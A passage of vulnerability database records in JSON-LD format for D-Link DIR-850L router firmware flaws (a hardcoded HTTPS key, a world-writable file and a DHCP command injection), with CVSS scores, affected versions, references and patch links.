        "id": "CNVD-2017-31787"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14422"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices use the same hardcoded /etc/stunnel.key private key across different customers\u0027 installations, which allows remote attackers to defeat the HTTPS cryptographic protection mechanisms by leveraging knowledge of this key from another installation. D-Link DIR-850L Device firmware contains a vulnerability related to the use of hard-coded credentials.Information may be obtained. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. This vulnerability is caused by different users using the same hard-coded private key during installation ( /etc/stunnel.key). This vulnerability could be exploited by a remote attacker to compromise the HTTPS encryption protection mechanism. key (/etc/stunnel.key)",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105143"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14422",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31787",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105143",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14422"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ]
  },
  "id": "VAR-201709-0593",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105143"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:29:25.021000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A  and REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235000"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14422"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14422"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14422"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14422"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105143"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14422"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105143"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "date": "2017-09-13T17:29:00.573000",
        "db": "NVD",
        "id": "CVE-2017-14422"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31787"
      },
      {
        "date": "2017-09-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105143"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      },
      {
        "date": "2023-11-08T20:59:19.633000",
        "db": "NVD",
        "id": "CVE-2017-14422"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to the use of hard-coded credentials in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008134"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-573"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0598

Vulnerability from variot - Updated: 2023-12-18 12:19

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices set 0666 permissions (readable and writable by every local user) on /var/run/storage_account_root. D-Link DIR-850L device firmware contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. A security vulnerability exists in REV. A devices with firmware FW114WWb07_h2ab_beta1 and earlier and in REV. B devices with firmware FW208WWb02 and earlier. An attacker could exploit the vulnerability to obtain a certificate.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0598",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14427"
      }
    ]
  },
  "cve": "CVE-2017-14427",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14427",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2017-31782",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-105148",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14427",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14427",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31782",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-568",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105148",
            "trust": 0.1,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-14427",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105148"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 (world-readable and world-writable) /var/run/storage_account_root permissions. The D-Link DIR-850L device firmware contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. A security vulnerability exists in REV. A devices using firmware FW114WWb07_h2ab_beta1 and earlier and in REV. B devices using firmware FW208WWb02 and earlier. An attacker could exploit the vulnerability to obtain a certificate.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105148"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14427"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14427",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105148",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14427",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105148"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ]
  },
  "id": "VAR-201709-0598",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105148"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:19:33.273000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A  and REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100048"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-276",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105148"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14427"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14427"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14427"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/276.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105148"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105148"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14427"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105148"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-14427"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "date": "2017-09-13T17:29:00.807000",
        "db": "NVD",
        "id": "CVE-2017-14427"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31782"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105148"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-14427"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      },
      {
        "date": "2023-11-17T19:59:48.367000",
        "db": "NVD",
        "id": "CVE-2017-14427"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008102"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-568"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0600

Vulnerability from variot - Updated: 2023-12-18 12:19

The DHCP client on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices allows unauthenticated remote code execution as root because /etc/services/INET/inet_ipv4.php mishandles shell metacharacters, affecting generated files such as WAN-1-udhcpc.sh. The D-Link DIR-850L device firmware contains a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. A security vulnerability exists in the DHCP client on REV. A devices using firmware FW114WWb07_h2ab_beta1 and earlier and on REV. B devices using firmware FW208WWb02 and earlier. The vulnerability arises because the /etc/services/INET/inet_ipv4.php file does not handle shell metacharacters correctly. A remote attacker could exploit the vulnerability to execute code with root privileges.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
